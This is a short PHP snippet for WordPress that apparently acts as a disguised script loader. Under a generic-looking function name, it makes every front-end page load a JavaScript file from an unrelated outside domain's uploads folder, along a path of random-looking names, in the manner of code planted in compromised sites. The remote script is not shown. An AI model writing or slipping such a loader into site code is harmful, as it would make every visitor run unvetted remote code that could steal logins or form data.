if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://granosbasicos.com/alpha/wp-content/uploads/assets-067691/cache-4844/front-1b39b962.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }